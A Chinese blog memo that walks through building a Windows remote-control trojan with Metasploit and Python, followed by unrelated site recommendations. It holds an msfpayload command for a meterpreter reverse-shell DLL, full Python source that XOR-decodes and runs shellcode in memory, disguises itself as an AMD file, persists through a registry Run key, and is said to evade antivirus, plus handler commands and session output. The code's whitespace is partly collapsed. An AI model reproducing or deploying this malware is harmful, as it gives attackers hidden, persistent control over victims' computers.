备忘录4.python+msf 制作 windows远控

创建dll

./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444  -t dll X > /tmp/sc.dll

python

main.py

import sys, osimport shutilimport timeimport ctypesimport globimport multiprocessingimport multiprocessing.forkingfrom sc import scfrom win32file import GetLongPathNameimport _winregfrom itertools import izip, cyclefrom utils import getppid, kill, get_base_dirRECONNECT_SLEEP = 60STARTUP_SLEEP = 30CHILD_STARTUP_SLEEP = 10METER_NAME = "aticlex.exe"METER_DIR = "AMD"USER_DIR = os.path.expanduser("~")try:    from win32com.shell import shellcon, shell    APPDATA_DIR = shell.SHGetFolderPath(0, shellcon.CSIDL_APPDATA, 0, 0)    DATA_DIR = os.path.join(APPDATA_DIR, METER_DIR)except:    DATA_DIR = os.path.join(USER_DIR, METER_DIR)METER_PATH = os.path.join(DATA_DIR, METER_NAME)class _Popen(multiprocessing.forking.Popen):    def__init__(self, *args, **kw):        if hasattr(sys, 'frozen'):            os.putenv('_MEIPASS2', sys._MEIPASS)        try:            super(_Popen, self).__init__(*args, **kw)        finally:            if hasattr(sys, 'frozen'):                os.unsetenv('_MEIPASS2')class Process(multiprocessing.Process):    _Popen = _Popenclass Worker(Process):    def xor(self, data, key='\x41\x82\x99\x73\x12\xf8\x0e\x38'):        return''.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key)))    def run(self):        time.sleep(CHILD_STARTUP_SLEEP)        code = self.xor(sc)        cbuf = ctypes.create_string_buffer(code)        func = ctypes.cast(cbuf, ctypes.CFUNCTYPE(ctypes.HRESULT))        func()def install():    reg = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER)    key = _winreg.OpenKey(reg, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, _winreg.KEY_ALL_ACCESS)    _winreg.SetValueEx(key, METER_NAME.split(".")[0], 0, _winreg.REG_SZ, METER_PATH)    path = GetLongPathName(sys.executable)    if path != METER_PATH:        ifnot os.path.exists(DATA_DIR):            os.makedirs(DATA_DIR)        try:            shutil.copy(path, METER_PATH)        except Exception as e:            sys.exit(1)        os.execve(METER_PATH, [METER_PATH], os.environ)def clean():    try:        base_dir = get_base_dir()        temp_dir = os.path.abspath(os.path.join(base_dir, os.pardir))        mei = base_dir.split("\\")[-1]        pattern = "%s\\_MEI*" % temp_dir        for path in glob.glob(pattern):            path = GetLongPathName(path)            if path != base_dir and mei.lower() notin path.lower():                try:                    shutil.rmtree(path)                except:                    passexcept:        passdef main():    kill(getppid())    time.sleep(STARTUP_SLEEP)    install()    clean()    while True:        p = Worker()        p.daemon = True        p.start()        p.join()        time.sleep(RECONNECT_SLEEP)if__name__ == "__main__":    multiprocessing.freeze_support()    main()

sc.py

sc='\x12\x34'.........

# sc = sc.dll open with rb mode

sc='\x12\x34'.........

# sc = sc.dll open with rb mode

然后pythoninstall 生成exe。

监听:

msf > use exploit/multi/handler

msf exploit(handler) > setpayload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > setlhost 192.168.1.123

lhost => 192.168.1.123

msf exploit(handler) > setlport 4444

lport => 4444

msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.123:4444

[*] Starting the payload handler...

[*] Sending stage (770048bytes) to 192.168.1.80

[*] Meterpreter session 1opened (192.168.1.123:4444-> 192.168.1.80:1138) at 2014-10-2219:03:43-0500

meterpreter >

msf > use exploit/multi/handler

msf exploit(handler) > setpayload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > setlhost 192.168.1.123

lhost => 192.168.1.123

msf exploit(handler) > setlport 4444

lport => 4444

msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.123:4444

[*] Starting the payload handler...

[*] Sending stage (770048bytes) to 192.168.1.80

[*] Meterpreter session 1opened (192.168.1.123:4444-> 192.168.1.80:1138) at 2014-10-2219:03:43-0500

meterpreter >

木马特征:

添加注册表启动项,定时load msf payload,过赛门铁克等杀软。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 220,002评论 6 509
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,777评论 3 396
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 166,341评论 0 357
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 59,085评论 1 295
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 68,110评论 6 395
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,868评论 1 308
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,528评论 3 420
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,422评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,938评论 1 319
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,067评论 3 340
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,199评论 1 352
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,877评论 5 347
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,540评论 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,079评论 0 23
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,192评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,514评论 3 375
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,190评论 2 357

推荐阅读更多精彩内容

  • WebShell root@kali:~# msfvenom -p php/meterpreter/reverse...
    Instu阅读 4,967评论 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,328评论 2 22
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,054评论 0 5
  • 一、MSF终端命令 show exploits 列出metasploit框架中所有的渗透攻击模块 show pay...
    Kaen阅读 3,263评论 0 1
  • 一 漏洞及漏洞发掘方法 漏洞,是指在硬件、软件、协议实现或系统安全策略上存在缺陷,攻击者能够在未授权的情况下对系统...
    kaitoulee阅读 15,236评论 0 30